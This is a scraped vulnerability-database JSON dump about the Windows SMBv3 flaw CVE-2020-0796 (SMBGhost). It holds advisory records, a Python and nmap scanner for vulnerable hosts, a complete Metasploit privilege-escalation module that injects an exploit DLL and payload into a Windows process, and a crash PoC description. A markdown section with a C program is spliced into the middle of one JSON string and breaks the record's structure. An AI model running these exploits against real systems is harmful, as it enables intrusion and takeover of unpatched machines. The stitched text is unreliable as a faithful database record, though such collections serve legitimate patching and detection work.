6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": 
"2020-03-12T07:00:00", "id": "MS:ADV200005", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV200005", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:11", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client.\n\nTo exploit the vulnerability against a server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server. To exploit the vulnerability against a client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.\n\nThe security update addresses the vulnerability by correcting how the SMBv3 protocol handles these specially crafted requests.\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T07:00:00", "type": "mscve", "title": "Windows SMBv3 Client/Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-13T07:00:00", "id": "MS:CVE-2020-0796", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-03-19T23:37:23", "description": "", "cvss3": {}, "published": "2020-03-15T00:00:00", "type": "packetstorm", "title": "Microsoft Windows SMB 3.1.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-15T00:00:00", "id": "PACKETSTORM:156732", "href": "https://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Windows SMBv3 Client/Server Remote Code Execution \nVulnerability - remote \n# Author: nu11secur1ty \n# Date: 2020-03-14 \n# Vendor: https://smb.wsu.edu/ \n# Link: \nhttps://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0796 \n# CVE: CVE-2020-0796 \n \n \n \n[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty) \n[+] Website: https://www.nu11secur1ty.com/ \n[+] Source: readme from GitHUB \n[+] twitter.com/nu11secur1ty \n \n \n[Exploit Program Code] \n-------------------------------------- \nimport socket \nimport struct \nimport sys \n \nsmbsuckmickey_mouse = 
\nb'\\x00\\x00\\x00\\xc0\\xfeSMB@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00$\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00x\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x02\\x10\\x02\"\\x02$\\x02\\x00\\x03\\x02\\x03\\x10\\x03\\x11\\x03\\x00\\x00\\x00\\x00\\x01\\x00&\\x00\\x00\\x00\\x00\\x00\\x01\\x00 \n\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\n\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \nsock = socket.socket(socket.AF_INET) \nsock.settimeout(3) \nsock.connect(( sys.argv[1], 445 )) \nsock.send(smbsuckmickey_mouse) \n \nnb, = struct.unpack(\">I\", sock.recv(4)) \nres = sock.recv(nb) \n \nif not res[68:70] == b\"\\x11\\x03\": \nexit(\"Not vulnerable.\") \nif not res[70:72] == b\"\\x02\\x00\": \nexit(\"Not vulnerable.\") \n \nexit(\"Vulnerable.\") \n \n-------------------------------------- \n \n#!/usr/bin/bash \nif [ $# -eq 0 ] \nthen \necho $'Usage:\\n\\vulnsmb.sh TARGET_IP_or_CIDR' \nexit 1 \nfi \necho \"Checking if there's SMB v3.11 in\" $1 \"...\" \nnmap -p445 --script smb-protocols -Pn -n $1 | grep -P \n'\\d+\\.\\d+\\.\\d+\\.\\d+|^\\|.\\s+3.11' | tr '\\n' ' ' | replace 'Nmap scan report \nfor' '@' | tr \"@\" \"\\n\" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP \n'\\d+\\.\\d+\\.\\d+\\.\\d+' \nif [[ $? 
!= 0 ]]; then \necho \"There's no SMB v3.11\" \nfi \n \n------------------------------------- \n \n[Vendor] \nMicrosoft \n \n \n[Product] \nhttps://smb.wsu.edu/ \n \n \n[Vulnerability Type] \nRemote + Layer 2 \n \n \n \n[Security Issue] \nThe security update addresses the vulnerability by correcting how the SMBv3 \nprotocol handles these specially crafted requests. \n \n \n[References] \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796 \nA remote code execution vulnerability exists in the way that the Microsoft \nServer Message Block 3.1.1 (SMBv3) protocol handles certain requests. \nAn attacker who successfully exploited the vulnerability could gain the \nability to execute code on the target server or client. \nTo exploit the vulnerability against a server, an unauthenticated attacker \ncould send a specially crafted packet to a targeted SMBv3 server. \nTo exploit the vulnerability against a client, an unauthenticated attacker \nwould need to configure a malicious SMBv3 server and convince a user to \nconnect to it. \nThe security update addresses the vulnerability by correcting how the SMBv3 \nprotocol handles these specially crafted requests. \n \n[Network Access] \nRemote + Layer 2 \n \n \n[Disclosure Timeline] \nPublished: 03/12/2020 \n \n \n[+] Disclaimer \nThe entry creation date may reflect when the CVE ID was allocated or \nreserved, \nand does not necessarily indicate when this vulnerability was discovered, \nshared \nwith the affected vendor, publicly disclosed, or updated in CVE. 
\n \n-- \n \nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= \nnu11secur1ty <http://nu11secur1ty.blogspot.com/> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156732/mswinsmb3-exec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-08T09:59:30", "description": "", "cvss3": {}, "published": "2020-04-06T00:00:00", "type": "packetstorm", "title": "SMBv3 Compression Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-04-06T00:00:00", "id": "PACKETSTORM:157110", "href": "https://packetstormsecurity.com/files/157110/SMBv3-Compression-Buffer-Overflow.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info={}) \nsuper(update_info(info, { \n'Name' => 'SMBv3 Compression Buffer Overflow', \n'Description' => %q{ \nA vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to \nexecute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself \nbefore injecting a payload into winlogon.exe. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Daniel Garc\u00eda Guti\u00e9rrez', # original LPE exploit \n'Manuel Blanco Paraj\u00f3n', # original LPE exploit \n'Spencer McIntyre' # metasploit module \n], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Targets' => \n[ \n#[ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ], \n[ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'References' => \n[ \n[ 'CVE', '2020-0796' ], \n[ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ], \n[ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ] \n], \n'DisclosureDate' => '2020-03-13', \n'DefaultTarget' => 0, \n'AKA' => [ 'SMBGhost', 'CoronaBlue' ], \n'Notes' => \n{ \n'Stability' => [ CRASH_OS_RESTARTS, ], \n'Reliability' => [ REPEATABLE_SESSION, ], \n}, \n})) \nend \n \ndef check \nsysinfo_value = sysinfo[\"OS\"] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn Exploit::CheckCode::Safe \nend \n \nbuild_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i \nvprint_status(\"Windows Build Number = #{build_num}\") \n# see https://docs.microsoft.com/en-us/windows/release-information/ \nunless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363) \nprint_error('The exploit only supports Windows 10 versions 1903 - 1909') \nreturn CheckCode::Safe \nend \n \ndisable_compression = registry_getvaldata(\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\",\"DisableCompression\") \nif !disable_compression.nil? && disable_compression != 0 \nprint_error('The exploit requires compression to be enabled') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nif is_system? 
\nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo[\"Architecture\"] =~ /wow64/i \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo[\"Architecture\"] == ARCH_X64 && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo[\"Architecture\"] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) \nbegin \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \n# Reader Sandbox won't allow to create a new process: \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \n \nprint_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\") \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll') \nlibrary_path = ::File.expand_path(library_path) \n \nprint_status(\"Injecting exploit into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \n \nprint_status(\"Exploit injected. Injecting payload into #{process.pid}...\") \nencoded_payload = payload.encoded \npayload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Payload injected. 
Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/157110/cve_2020_0796_smbghost.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:20", "description": "\nMicrosoft Windows 10 (1903/1909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Buffer Overflow (PoC)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-14T00:00:00", "title": "Microsoft Windows 10 (1903/1909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Buffer Overflow (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-14T00:00:00", "id": "EXPLOITPACK:CFD5A967D4C18FB68D3D775FE9AAAA38", "href": "", "sourceData": "# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost\n\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip\n\n## 
Usage\n\n`./CVE-2020-0796.py servername`\n\nThis script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target.\n\nThis contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3.\n\nThe compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set all high to trigger the crash.\n\n```python\n def _compress(self, b_data, session):\n header = SMB2CompressionTransformHeader()\n header['original_size'] = len(b_data)\n header['offset'] = 4294967295\n header['data'] = smbprotocol.lznt1.compress(b_data)\n```\n\n## About\n\nCVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression capabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271).\n\nOnce a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). 
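The `_compress` snippet above sets the transform header's `offset` to 4294967295 (0xFFFFFFFF). The C program below is an added example written for this page; it is not code from the PoC, from smbprotocol or from Microsoft. It builds and parses the 16-byte SMB2 COMPRESSION_TRANSFORM_HEADER defined in MS-SMB2 2.2.42 (ProtocolId 0xFC 'S' 'M' 'B', OriginalCompressedSegmentSize, CompressionAlgorithm, Flags/Reserved, Offset/Length) and contrasts the pre-patch sizing logic, which the public analyses of the bug describe as an unchecked 32-bit sum of OriginalCompressedSegmentSize and Offset/Length, with a hardened version. The allocation and write-extent model is a user-space stand-in for the kernel driver, an assumption made for illustration, and both sample headers are constructed.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* SMB2 COMPRESSION_TRANSFORM_HEADER (MS-SMB2 2.2.42): 16 bytes, every field little-endian. */
#define SMB2_COMPRESSION_HDR_LEN     16u
#define SMB2_COMPRESSION_PROTOCOL_ID 0x424D53FCu /* on the wire: FC 'S' 'M' 'B' */

enum smb2_compression_alg {
    SMB2_COMPRESSION_NONE = 0, SMB2_COMPRESSION_LZNT1 = 1,
    SMB2_COMPRESSION_LZ77 = 2, SMB2_COMPRESSION_LZ77_HUFFMAN = 3,
};

struct smb2_compression_hdr {
    uint32_t protocol_id;
    uint32_t original_size; /* OriginalCompressedSegmentSize: size of the segment once decompressed */
    uint16_t algorithm;     /* CompressionAlgorithm */
    uint16_t flags;         /* Flags (Reserved in the spec revision current in March 2020) */
    uint32_t offset;        /* Offset/Length: bytes sent uncompressed in front of the compressed data */
};

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void wr32le(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Serialise a transform header the way the PoC's _compress() does; the caller chooses offset. */
void build_transform_header(uint8_t out[SMB2_COMPRESSION_HDR_LEN], uint32_t original_size,
                            uint16_t algorithm, uint32_t offset)
{
    wr32le(out, SMB2_COMPRESSION_PROTOCOL_ID);
    wr32le(out + 4, original_size);
    out[8] = (uint8_t)algorithm;
    out[9] = (uint8_t)(algorithm >> 8);
    out[10] = out[11] = 0; /* Flags / Reserved */
    wr32le(out + 12, offset);
}

/* Parse a transform header; false when the buffer is short or the magic is not FC 'S' 'M' 'B'. */
bool parse_transform_header(const uint8_t *buf, size_t len, struct smb2_compression_hdr *h)
{
    if (len < SMB2_COMPRESSION_HDR_LEN || rd32le(buf) != SMB2_COMPRESSION_PROTOCOL_ID)
        return false;
    h->protocol_id   = rd32le(buf);
    h->original_size = rd32le(buf + 4);
    h->algorithm     = (uint16_t)(buf[8] | buf[9] << 8);
    h->flags         = (uint16_t)(buf[10] | buf[11] << 8);
    h->offset        = rd32le(buf + 12);
    return true;
}

/* Bytes the decompression path writes into the output buffer: the `offset` bytes copied
 * through unchanged, followed by `original_size` bytes of decompressed data. */
uint64_t bytes_written(const struct smb2_compression_hdr *h)
{
    return (uint64_t)h->offset + h->original_size;
}

/* Pre-patch sizing as the public analyses describe it (modelled here, not lifted from srv2.sys):
 * the two attacker-controlled fields are summed in 32 bits with no overflow check, so
 * offset = 0xFFFFFFFF wraps the result to a tiny allocation that the writes above overrun. */
uint32_t vulnerable_alloc_size(const struct smb2_compression_hdr *h)
{
    return h->original_size + h->offset;
}

/* Hardened sizing: reject a wrapping sum, an offset larger than the bytes actually received
 * after the header, and an algorithm the server does not handle. */
bool hardened_alloc_size(const struct smb2_compression_hdr *h, size_t payload_len, uint32_t *alloc)
{
    uint64_t total = bytes_written(h);
    if (total > UINT32_MAX || h->offset > payload_len)
        return false;
    if (h->algorithm == SMB2_COMPRESSION_NONE || h->algorithm > SMB2_COMPRESSION_LZ77_HUFFMAN)
        return false;
    *alloc = (uint32_t)total;
    return true;
}

int main(void)
{
    uint8_t raw[SMB2_COMPRESSION_HDR_LEN];
    struct smb2_compression_hdr h;
    uint32_t alloc = 0;

    /* Constructed input: the PoC's header, Offset/Length = 4294967295, a 0x100-byte segment,
     * 0x80 bytes received after the header. */
    build_transform_header(raw, 0x100, SMB2_COMPRESSION_LZNT1, 0xFFFFFFFFu);
    if (parse_transform_header(raw, sizeof raw, &h))
        printf("PoC header: vulnerable alloc 0x%x, decompressor writes 0x%llx, hardened accepts=%d\n",
               (unsigned)vulnerable_alloc_size(&h), (unsigned long long)bytes_written(&h),
               (int)hardened_alloc_size(&h, 0x80, &alloc));

    /* Constructed input: a benign header leaving a 64-byte SMB2 header uncompressed. */
    build_transform_header(raw, 0x100, SMB2_COMPRESSION_LZNT1, 64);
    if (parse_transform_header(raw, sizeof raw, &h) && hardened_alloc_size(&h, 0x80, &alloc))
        printf("benign header: hardened alloc 0x%x bytes\n", (unsigned)alloc);
    return 0;
}
```

Compile with `cc -std=c11 smbghost_hdr.c`. With the PoC's header the vulnerable path allocates 0xFF bytes while the decompressor would write 0x1000000FF bytes, which is the heap overflow the README describes; the hardened path rejects the header before anything is allocated. The wrap is also why the PoC sets `offset` to the maximum 32-bit value rather than to something merely large: only a sum that crosses 2^32 shrinks the allocation.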
This header is a small (16 bytes) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value.\n\nCVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. With further work, this could be developed into an RCE exploit.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:40:20", "description": "\nMicrosoft Windows 10 (1903/1909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Local Privilege Escalation", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-30T00:00:00", "title": "Microsoft Windows 10 (1903/1909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-30T00:00:00", "id": "EXPLOITPACK:162FCF5EA0445C77E29A0F6775C5E7F6", "href": "", "sourceData": "# CVE-2020-0796\n\nWindows SMBv3 LPE Exploit\n\n\n\n## Authors\n\n 
* Daniel Garc\u00eda Guti\u00e9rrez ([@danigargu](https://twitter.com/danigargu))\n * Manuel Blanco Paraj\u00f3n ([@dialluvioso_](https://twitter.com/dialluvioso_))\n\n## References\n\n* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796\n* https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html\n* https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter\n* https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/\n* http://blogs.360.cn/post/CVE-2020-0796.html\n* https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/\n\n\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48267.zip", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2021-07-28T14:33:16", "description": "**Name**| SMBGHOST \n---|--- \n**CVE**| CVE-2020-0796-1 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| SMBGHOST \n**Notes**| CVE Name: CVE-2020-0796 \nVENDOR: Microsoft \nNOTES: some notes here \n \nVersionsAffected: VERSIONS \nRepeatability: None \nReferences: https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796 \nDate public: 4/13/2020 \nCVSS: 10.0 \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-12T16:15:00", "title": "Immunity Canvas: SMBGHOST", 
"type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T16:15:00", "id": "SMBGHOST", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/SMBGHOST", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:14", "description": "**Name**| smbghost_lpe \n---|--- \n**CVE**| CVE-2020-0796 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| smbghost_lpe \n**Notes**| CVE Name: CVE-2020-0796 \nNotes: Tested: - Windows 10 1903 x64 - Windows 10 1909 x64 \nVENDOR: Microsoft \nCVE Url: https://nvd.nist.gov/vuln/detail/CVE-2020-0796 \nCVSS: 10.0 \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-12T16:15:00", "title": "Immunity Canvas: SMBGHOST_LPE", "type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T16:15:00", "id": "SMBGHOST_LPE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/smbghost_lpe", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:38:33", "description": "[](<https://thehackernews.com/images/-5ab1xlAFvIs/XmprBKhq5MI/AAAAAAAA2hk/2zyiQtK0qLk65nIPuJSj39T5x7IgNWU8QCLcBGAsYHQ/s728-e100/windows-update-smb-flaw.jpg>)\n\nMicrosoft today finally released an emergency software update to patch the recently disclosed very dangerous [vulnerability in SMBv3 protocol](<https://thehackernews.com/2020/03/smbv3-wormable-vulnerability.html>) that could let attackers launch **wormable malware**, which can propagate itself from one vulnerable computer to another automatically. \n \nThe vulnerability, tracked as **CVE-2020-0796**, in question is a remote code execution flaw that impacts Windows 10 version 1903 and 1909, and Windows Server version 1903 and 1909. \n \nServer Message Block (SMB), which runs over TCP port 445, is a network protocol that has been designed to enable file sharing, network browsing, printing services, and interprocess communication over a network. \n \nThe latest vulnerability, for which a patch update ([KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>)) is now available on the Microsoft website, exists in the way SMBv3 protocol handles requests with compression headers, making it possible for unauthenticated remote attackers to execute malicious code on target servers or clients with SYSTEM privileges. 
